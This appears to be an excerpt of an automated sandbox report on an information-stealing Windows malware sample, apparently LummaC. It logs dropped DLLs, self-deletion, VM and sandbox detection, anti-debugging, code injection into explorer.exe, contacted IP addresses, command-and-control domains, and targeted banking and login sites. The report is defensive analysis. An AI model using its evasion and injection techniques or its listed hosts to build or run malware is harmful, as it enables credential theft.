                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dllJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\5876.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\ProgramData\FBGIDHCAAKEB\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\ProgramData\FBGIDHCAAKEB\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\ProgramData\FBGIDHCAAKEB\mozglue.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\ProgramData\FBGIDHCAAKEB\msvcp140.dllJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\etrtabdJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dllJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\EE6.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\ProgramData\FBGIDHCAAKEB\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\ProgramData\FBGIDHCAAKEB\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqls[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\ProgramData\FBGIDHCAAKEB\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\ProgramData\FBGIDHCAAKEB\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\ProgramData\FBGIDHCAAKEB\mozglue.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\ProgramData\FBGIDHCAAKEB\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\ProgramData\FBGIDHCAAKEB\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile created: C:\ProgramData\FBGIDHCAAKEB\softokn3.dllJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\etrtabdJump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Deletes itself after installation
                    Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\xvjv1bpknz.exeJump to behavior
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\etrtabd:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: katDDA4.tmp PID: 7360, type: MEMORYSTR
                    Checks if the current machine is a virtual machine (disk enumeration)
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\etrtabdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\etrtabdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\etrtabdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\etrtabdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\etrtabdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Source: C:\Users\user\AppData\Roaming\etrtabdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                    Query firmware table information (likely to detect VMs)
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000422000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_007A2D2F rdtsc 7_2_007A2D2F
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 481Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1153Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 774Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 351Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 377Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3695Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 875Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 880Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpDropped PE file which has not been started: C:\ProgramData\FBGIDHCAAKEB\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpDropped PE file which has not been started: C:\ProgramData\FBGIDHCAAKEB\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpDropped PE file which has not been started: C:\ProgramData\FBGIDHCAAKEB\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqls[1].dllJump to dropped file
                    Source: C:\Windows\explorer.exe TID: 7556Thread sleep count: 481 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 7564Thread sleep count: 1153 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 7564Thread sleep time: -115300s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 7560Thread sleep count: 774 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 7560Thread sleep time: -77400s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 7900Thread sleep count: 351 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 7900Thread sleep time: -35100s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 7896Thread sleep count: 299 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 7904Thread sleep count: 377 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 7904Thread sleep time: -37700s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 7564Thread sleep count: 3695 > 30Jump to behavior
                    Source: C:\Windows\explorer.exe TID: 7564Thread sleep time: -369500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe TID: 8020Thread sleep time: -210000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exe TID: 4508Thread sleep count: 54 > 30
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0CEBF0 PR_GetNumberOfProcessors,GetSystemInfo,12_2_6D0CEBF0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                    Source: 5876.exe, 00000007.00000003.1761083758.0000000002CDE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
                    Source: IEBAAF.12.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                    Source: explorer.exe, 00000002.00000000.1403647144.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
                    Source: IEBAAF.12.drBinary or memory string: AMC password management pageVMware20,11696494690
                    Source: IEBAAF.12.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                    Source: IEBAAF.12.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                    Source: IEBAAF.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                    Source: IEBAAF.12.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                    Source: IEBAAF.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                    Source: explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1742482875.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000002.2152415430.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000949000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                    Source: explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                    Source: explorer.exe, 00000002.00000000.1403647144.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
                    Source: IEBAAF.12.drBinary or memory string: tasks.office.comVMware20,11696494690o
                    Source: IEBAAF.12.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                    Source: explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
                    Source: IEBAAF.12.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                    Source: IEBAAF.12.drBinary or memory string: global block list test formVMware20,11696494690
                    Source: 5876.exe, 00000007.00000003.1742482875.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW?n
                    Source: katDDA4.tmp, 0000000C.00000002.2540474103.00000000076B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: IEBAAF.12.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                    Source: IEBAAF.12.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                    Source: IEBAAF.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                    Source: IEBAAF.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                    Source: IEBAAF.12.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                    Source: IEBAAF.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                    Source: explorer.exe, 00000002.00000000.1403647144.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: IEBAAF.12.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                    Source: explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: IEBAAF.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000008CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                    Source: IEBAAF.12.drBinary or memory string: discord.comVMware20,11696494690f
                    Source: IEBAAF.12.drBinary or memory string: outlook.office.comVMware20,11696494690s
                    Source: IEBAAF.12.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                    Source: IEBAAF.12.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                    Source: explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00=
                    Source: IEBAAF.12.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                    Source: IEBAAF.12.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                    Source: IEBAAF.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                    Source: explorer.exe, 00000002.00000000.1403647144.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: IEBAAF.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                    Source: IEBAAF.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                    Source: IEBAAF.12.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                    Source: IEBAAF.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                    Source: explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                    Source: IEBAAF.12.drBinary or memory string: dev.azure.comVMware20,11696494690j
                    Source: katDDA4.tmp, 0000000C.00000002.2540474103.00000000076B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareoItL
                    Source: explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeSystem information queried: CodeIntegrityInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\etrtabdSystem information queried: CodeIntegrityInformationJump to behavior
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\etrtabdProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_007A2D2F rdtsc 7_2_007A2D2F
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_00403406 LdrLoadDll,ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingW,MapViewOfFile,0_2_00403406
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D19AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_6D19AC62
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_0211092B mov eax, dword ptr fs:[00000030h]0_2_0211092B
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_02110D90 mov eax, dword ptr fs:[00000030h]0_2_02110D90
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_02155A27 push dword ptr fs:[00000030h]0_2_02155A27
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_020C092B mov eax, dword ptr fs:[00000030h]6_2_020C092B
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_020C0D90 mov eax, dword ptr fs:[00000030h]6_2_020C0D90
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: 6_2_02205FC7 push dword ptr fs:[00000030h]6_2_02205FC7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_0079DAB3 push dword ptr fs:[00000030h]7_2_0079DAB3
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_0212092B mov eax, dword ptr fs:[00000030h]7_2_0212092B
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_02120D90 mov eax, dword ptr fs:[00000030h]7_2_02120D90
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_0040BD58 LocalReAlloc,InterlockedExchange,RtlDeleteCriticalSection,InitAtomTable,WriteConsoleOutputA,ReadFileScatter,GetModuleFileNameW,RaiseException,RtlInterlockedPopEntrySList,FileTimeToSystemTime,SetCalendarInfoA,SetConsoleMode,GetFileAttributesW,CompareStringW,ActivateActCtx,LoadLibraryA,EnumTimeFormatsW,GetProcessHeaps,0_2_0040BD58
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D19AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_6D19AC62

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Benign windows process drops PE files
                    Source: C:\Windows\explorer.exeFile created: EE6.exe.2.drJump to dropped file
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\explorer.exeNetwork Connect: 109.175.29.39 80Jump to behavior
                    Source: C:\Windows\explorer.exeNetwork Connect: 190.13.174.94 80Jump to behavior
                    Source: C:\Windows\explorer.exeNetwork Connect: 91.202.233.231 80Jump to behavior
                    Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.124 80Jump to behavior
                    Source: C:\Windows\explorer.exeNetwork Connect: 190.147.128.172 80Jump to behavior
                    Source: C:\Windows\explorer.exeNetwork Connect: 45.129.96.86 80Jump to behavior
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: Process Memory Space: EE6.exe PID: 1640, type: MEMORYSTR
                    Allocates memory in foreign processes
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeMemory allocated: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 400000 protect: page execute and read and writeJump to behavior
                    Contains functionality to inject code into remote processes
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeCode function: 11_2_0427A4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,11_2_0427A4F0
                    Creates a thread in another existing process (thread injection)
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeThread created: C:\Windows\explorer.exe EIP: 89B19E0Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\etrtabdThread created: unknown EIP: 8BD19E0Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeMemory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 400000 value starts with: 4D5AJump to behavior
                    LummaC encrypted strings found
                    Source: 5876.exeString found in binary or memory: zippyfinickysofwps.shop
                    Source: 5876.exeString found in binary or memory: obsceneclassyjuwks.shop
                    Source: 5876.exeString found in binary or memory: acceptabledcooeprs.shop
                    Source: 5876.exeString found in binary or memory: whispedwoodmoodsksl.shop
                    Source: 5876.exeString found in binary or memory: boredimperissvieos.shop
                    Source: 5876.exeString found in binary or memory: holicisticscrarws.shop
                    Source: 5876.exeString found in binary or memory: sweetsquarediaslw.shop
                    Source: 5876.exeString found in binary or memory: plaintediousidowsko.shop
                    Source: 5876.exeString found in binary or memory: miniaturefinerninewjs.shop
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
